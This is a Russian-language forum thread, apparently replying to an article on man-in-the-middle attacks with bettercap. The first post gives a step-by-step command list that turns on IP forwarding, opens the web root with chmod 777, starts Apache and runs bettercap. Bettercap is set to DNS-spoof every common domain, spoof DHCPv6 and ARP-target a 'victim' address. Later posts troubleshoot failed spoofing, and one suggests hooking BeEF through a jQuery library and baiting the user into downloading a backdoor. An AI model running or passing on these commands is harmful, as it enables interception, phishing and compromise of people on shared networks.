 |
|
25.05.2019, 10:42
|
|
Новичок
Регистрация: 31.01.2017
Сообщений: 0
С нами:
4884672
Репутация:
0
|
|
uralcz сказал(а):
Ввел эти две команды в терминал, ничего не изменилось.
Смартфон тупо зависает при открытии любой ссылки под атакой, компьютеры Win 8.1 и Win 10 атаку даже не замечают.
Если подключен к проводному интернету, отключись и подключись к wifi сети, после вводи поочерёдно:
Код:
Код:
sudo su
chmod 777 /var/www/html
echo 1 > /proc/sys/net/ipv4/ip_forward
service apache2 start
bettercap
set dns.spoof.address 192.168.100.12 // атакующий
set dns.spoof.domains *.net,*.com,*.ru,*.org,*.su,*.co,*.info,*.vip
set dhcp6.spoof.domains *.net,*.com,*.ru,*.org,*.su,*.co,*.info,*.vip
set arp.spoof.targets 192.168.100.10 // жертва
dns.spoof on
dhcp6.spoof on
arp.ban on
При включение bettercap должна быть строка 192.168.0.0/24>192.168.0.**
На следующей неделе, если будет время сниму небольшое видео к этой статье.
|
|
|
25.05.2019, 14:19
|
|
Новичок
Регистрация: 31.01.2017
Сообщений: 0
С нами:
4884672
Репутация:
0
|
|
Кустурица сказал(а):
Видео - это отлично. Но не забудь хоть как-то прокомментировать движения курсора. Не утруждай зрителя телепатией. Надеюсь.это будет не глухо-немое кино.
Вероятнее всего наложение субтитров.
|
|
|
|
06.06.2019, 10:20
|
|
Новичок
Регистрация: 21.05.2019
Сообщений: 0
С нами:
3675393
Репутация:
0
|
|
а долго ждать видосика ? ))))
|
|
|
|
08.07.2019, 22:07
|
|
Новичок
Регистрация: 07.07.2019
Сообщений: 0
С нами:
3606979
Репутация:
0
|
|
@centr Отличная статья, хорошее оформление. Буду ждать продолжения. Заметил 1 но, если на атакуемой машине переходить по закладкам то будет так:
А если уже вводить руками в адресную строку, то все работает.
|
|
|
|
09.07.2019, 02:52
|
|
Новичок
Регистрация: 31.01.2017
Сообщений: 0
С нами:
4884672
Репутация:
0
|
|
Через пару месяцев, врятле раньше получится, так как сейчас лето и большой поток туристов. Времени практически нет. Ноут взял, но времени нет.
|
|
|
|
30.08.2019, 06:14
|
|
Новичок
Регистрация: 21.05.2019
Сообщений: 0
С нами:
3675393
Репутация:
0
|
|
без видосика чет не поучается (
|
|
|
|
02.01.2020, 20:48
|
|
Новичок
Регистрация: 21.12.2019
Сообщений: 0
С нами:
3366659
Репутация:
0
|
|
"Содержимое переменной "str" меняется на содержание файла созданного сертификата "ca.crt", для корректной работы скрипта переносы строк из файла сертификата удаляются."
ету строчку не понял, там ведь (.....B 92 1C 18 EB 36 FC E4 E8 FD CC 9D 5B B8 7C BC A8 84 ED EE 49 F3 71 05 E9 D5 8B FB A3 3B CB 2B 90 C9 36 43 C4 07 9B 28 87 FB 5A F7 99 52 5F 1B D6 BD 19 5D 36 0F 50 85 21 0A 93 99 C1 D1.....)
без видео никак
|
|
|
|
08.01.2021, 00:45
|
|
Новичок
Регистрация: 15.05.2019
Сообщений: 0
С нами:
3684076
Репутация:
0
|
|
В чем может быть ошибка?
Атакующая - 192.168.1.54
Атакуема - 192.168.1.54
При проведении атаки выяснилось что bettercap подменяет только несуществующие сайты.
К примеру при попытке подключиться к vk.com браузер думает что нет соединения, а при попытке подключения к wedfghjsdhjsdghs.com атака проходит успешно и меня перенаправляет на сайт с сертификатом. С http тоже самое.
|
|
|
|
08.01.2021, 07:14
|
|
Новичок
Регистрация: 15.12.2020
Сообщений: 0
С нами:
2849203
Репутация:
0
|
|
fleash сказал(а):
В чем может быть ошибка?
Атакующая - 192.168.1.54
Атакуема - 192.168.1.54
При проведении атаки выяснилось что bettercap подменяет только несуществующие сайты.
К примеру при попытке подключиться к vk.com браузер думает что нет соединения, а при попытке подключения к wedfghjsdhjsdghs.com атака проходит успешно и меня перенаправляет на сайт с сертификатом. С http тоже самое.
если делаешь спуфинг, чекни nslookup днс серва. возможно, у тебя стоять гугловские или опен днс.
И дигом чекни респонс со своего днс сервера
|
|
|
|
08.01.2021, 07:17
|
|
Новичок
Регистрация: 15.12.2020
Сообщений: 0
С нами:
2849203
Репутация:
0
|
|
Можно меньше париться, и подцепить beef через jquery или какую-то другую либу, чем трафик перехватывать. А потом забайтить юзера, скачать backdoor.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
